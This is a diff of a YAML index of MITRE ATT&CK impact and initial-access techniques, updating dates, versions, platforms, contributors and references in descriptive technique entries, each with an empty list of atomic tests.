-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
-      type: attack-pattern
-      created: '2019-04-17T20:23:15.105Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1498
-        url: https://attack.mitre.org/techniques/T1498
-      - source_name: FireEye OpPoisonedHandover February 2016
-        url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
-        description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
-          3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
-          Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
-      - source_name: FSISAC FraudNetDoS September 2012
-        url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
-        description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
-          Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
-          Fraud. Retrieved April 18, 2019.
-      - source_name: Symantec DDoS October 2014
-        url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
-        description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
-          Retrieved April 24, 2019.
-      - source_name: Cisco DoSdetectNetflow
-        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
-        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
-          Retrieved April 25, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T16:01:00.510Z'
       name: Network Denial of Service
       description: |-
         Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -58891,6 +59786,10 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_contributors:
+      - Yossi Weizman, Azure Defender Research Team
+      - Vishwas Manral, McAfee
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection of Network DoS can sometimes be achieved before
         the traffic volume is sufficient to cause impact to the availability of the
         service, but such response time typically requires very aggressive monitoring
@@ -58903,16 +59802,52 @@ impact:
         may be small and the indicator of an event availability of the network or
         service drops. The analysis tools mentioned can then be used to determine
         the type of DoS causing the outage and help with remediation.'
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      - Containers
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Sensor Health: Host Status'
       x_mitre_impact_type:
       - Availability
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
+      created: '2019-04-17T20:23:15.105Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1498
+        external_id: T1498
+      - source_name: Cisco DoSdetectNetflow
+        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+          Retrieved April 25, 2019.
+        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+      - source_name: FSISAC FraudNetDoS September 2012
+        description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
+          Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
+          Fraud. Retrieved September 23, 2024.
+        url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+      - source_name: FireEye OpPoisonedHandover February 2016
+        description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
+          3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
+          Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
+        url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
+      - source_name: Symantec DDoS October 2014
+        description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
+          Retrieved April 24, 2019.
+        url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1495:
     technique:
@@ -58980,11 +59915,10 @@ impact:
       - Availability
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1490:
     technique:
-      modified: '2024-04-12T02:30:08.379Z'
+      modified: '2024-09-24T13:27:31.881Z'
       name: Inhibit System Recovery
       description: |-
         Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
@@ -59002,7 +59936,7 @@ impact:
 
         On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.
 
-        Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
+        Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
@@ -59029,7 +59963,7 @@ impact:
       - Network
       - IaaS
       - Containers
-      x_mitre_version: '1.4'
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Modification'
@@ -59079,13 +60013,12 @@ impact:
         url: https://www.zdnet.com/article/ransomware-victims-thought-their-backups-were-safe-they-were-wrong/
       - source_name: disable_notif_synology_ransom
         description: TheDFIRReport. (2022, March 1). Disabling notifications on Synology
-          servers before ransom. Retrieved October 19, 2022.
-        url: https://twitter.com/TheDFIRReport/status/1498657590259109894
+          servers before ransom. Retrieved September 12, 2024.
+        url: https://x.com/TheDFIRReport/status/1498657590259109894
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1490
     atomic_tests: []
   T1561.001:
@@ -59153,11 +60086,10 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1529:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-22T20:45:22.531Z'
       name: System Shutdown/Reboot
       description: |-
         Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. <code>reload</code>).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)
@@ -59222,13 +60154,12 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1529
     atomic_tests: []
 initial-access:
   T1133:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:36.318Z'
       name: External Remote Services
       description: |-
         Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -59306,7 +60237,6 @@ initial-access:
         url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1133
     atomic_tests: []
   T1195.001:
@@ -59356,11 +60286,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1566.002:
     technique:
-      modified: '2024-04-15T23:51:25.037Z'
+      modified: '2024-10-15T16:06:32.591Z'
       name: 'Phishing: Spearphishing Link'
       description: |-
         Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
@@ -59399,10 +60328,10 @@ initial-access:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '2.6'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Application Log: Application Log Content'
@@ -59419,7 +60348,7 @@ initial-access:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: CISA IDN ST05-016
         description: 'CISA. (2019, September 27). Security Tip (ST05-016): Understanding
           Internationalized Domain Names. Retrieved October 20, 2020.'
@@ -59458,12 +60387,11 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1566.002
     atomic_tests: []
   T1566.001:
     technique:
-      modified: '2024-01-31T14:09:27.066Z'
+      modified: '2024-10-15T16:42:01.552Z'
       name: 'Phishing: Spearphishing Attachment'
       description: "Adversaries may send spearphishing emails with a malicious attachment
         in an attempt to gain access to victim systems. Spearphishing attachment is
@@ -59525,7 +60453,7 @@ initial-access:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: Unit 42 DarkHydrus July 2018
         description: Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus
           Targets Middle East Government. Retrieved August 2, 2018.
@@ -59542,7 +60470,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1566.001
     atomic_tests: []
   T1195.003:
@@ -59572,7 +60499,7 @@ initial-access:
         the adversary a high degree of control over the system. Hardware backdoors
         may be inserted into various devices, such as servers, workstations, network
         infrastructure, or peripherals.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-28T16:05:10.755Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Compromise Hardware Supply Chain
       x_mitre_detection: Perform physical inspection of hardware to look for potential
@@ -59586,7 +60513,6 @@ initial-access:
       - 'Sensor Health: Host Status'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1091:
     technique:
@@ -59649,12 +60575,11 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1091
     atomic_tests: []
   T1195:
     technique:
-      modified: '2024-02-26T14:23:37.009Z'
+      modified: '2024-10-04T11:17:00.778Z'
       name: Supply Chain Compromise
       description: "Adversaries may manipulate products or product delivery mechanisms
         prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply
@@ -59729,7 +60654,7 @@ initial-access:
         description: Schneider Electric. (2018, August 24). Security Notification
           – USB Removable Media Provided With Conext Combox and Conext Battery Monitor.
           Retrieved May 28, 2019.
-        url: https://www.se.com/ww/en/download/document/SESN-2018-236-01/
+        url: https://www.se.com/us/en/download/document/SESN-2018-236-01/
       - source_name: Trendmicro NPM Compromise
         description: Trendmicro. (2018, November 29). Hacker Infects Node.js Package
           to Steal from Bitcoin Wallets. Retrieved April 10, 2019.
@@ -59743,19 +60668,18 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1195
     atomic_tests: []
   T1190:
     technique:
-      modified: '2023-11-28T21:27:35.373Z'
+      modified: '2024-09-24T14:33:53.433Z'
       name: Exploit Public-Facing Application
       description: |-
         Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.
 
-        Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
+        Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
 
-        If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
+        If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
 
         Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)
 
@@ -59781,7 +60705,7 @@ initial-access:
       - Linux
       - macOS
       - Containers
-      x_mitre_version: '2.5'
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Application Log: Application Log Content'
@@ -59836,7 +60760,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1659:
     technique:
@@ -59899,11 +60822,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -59918,6 +60840,7 @@ initial-access:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -59926,18 +60849,18 @@ initial-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -59969,14 +60892,11 @@ initial-access:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests: []
   T1199:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-15T16:08:39.968Z'
       name: Trusted Relationship
       description: |-
         Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.
@@ -59987,6 +60907,11 @@ initial-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_contributors:
+      - Praetorian
+      - ExtraHop
+      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      x_mitre_deprecated: false
       x_mitre_detection: Establish monitoring for activity conducted by second and
         third party providers and other trusted entities that may be leveraged as
         a means to gain access to the network. Depending on the type of relationship,
@@ -59995,22 +60920,18 @@ initial-access:
         is based on IT services. Adversaries may be able to act quickly towards an
         objective, so proper monitoring for behavior related to Credential Access,
         Lateral Movement, and Collection will be important to detect the intrusion.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Office 365
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '2.3'
-      x_mitre_contributors:
-      - Praetorian
-      - ExtraHop
-      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '2.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Logon Session: Logon Session Metadata'
@@ -60035,36 +60956,19 @@ initial-access:
         url: https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&rs=en-us&ad=us
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1566:
     technique:
-      modified: '2024-03-01T16:56:32.245Z'
+      modified: '2024-10-07T15:00:19.668Z'
       name: Phishing
-      description: "Adversaries may send phishing messages to gain access to victim
-        systems. All forms of phishing are electronically delivered social engineering.
-        Phishing can be targeted, known as spearphishing. In spearphishing, a specific
-        individual, company, or industry will be targeted by the adversary. More generally,
-        adversaries can conduct non-targeted phishing, such as in mass malware spam
-        campaigns.\n\nAdversaries may send victims emails containing malicious attachments
-        or links, typically to execute malicious code on victim systems. Phishing
-        may also be conducted via third-party services, like social media platforms.
-        Phishing may also involve social engineering techniques, such as posing as
-        a trusted source, as well as evasive techniques such as removing or manipulating
-        emails or metadata/headers from compromised accounts being abused to send
-        messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation:
-        Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)
-        Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof)
-        the identity of the sender which can be used to fool both the human recipient
-        as well as automated security tools.(Citation: cyberproof-double-bounce) \n\nVictims
-        may also receive phishing messages that instruct them to call a phone number
-        where they are directed to visit a malicious URL, download malware,(Citation:
-        sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software)
-        or install adversary-accessible remote management tools onto their computer
-        (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation:
-        Unit42 Luna Moth)"
+      description: |-
+        Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
+
+        Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools,(Citation: cyberproof-double-bounce) or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., "thread hijacking").(Citation: phishing-krebs)
+
+        Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: initial-access
@@ -60093,9 +60997,9 @@ initial-access:
       - macOS
       - Windows
       - SaaS
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.5'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Network Traffic: Network Traffic Flow'
@@ -60113,7 +61017,11 @@ initial-access:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+      - source_name: phishing-krebs
+        description: 'Brian Krebs. (2024, March 28). Thread Hijacking: Phishes That
+          Prey on Your Curiosity. Retrieved September 27, 2024.'
+        url: https://krebsonsecurity.com/2024/03/thread-hijacking-phishes-that-prey-on-your-curiosity/
       - source_name: CISA Remote Monitoring and Management Software
         description: CISA. (n.d.). Protecting Against Malicious Use of Remote Monitoring
           and Management Software. Retrieved February 2, 2023.
@@ -60151,11 +61059,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -60172,7 +61079,6 @@ initial-access:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -60182,7 +61088,7 @@ initial-access:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -60191,19 +61097,17 @@ initial-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -60251,11 +61155,12 @@ initial-access:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1566.004:
     technique:
-      modified: '2023-10-15T11:49:40.990Z'
+      modified: '2024-10-15T16:06:47.134Z'
       name: Spearphishing Voice
       description: |-
         Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.
@@ -60275,10 +61180,8 @@ initial-access:
       - Linux
       - macOS
       - Windows
-      - Office 365
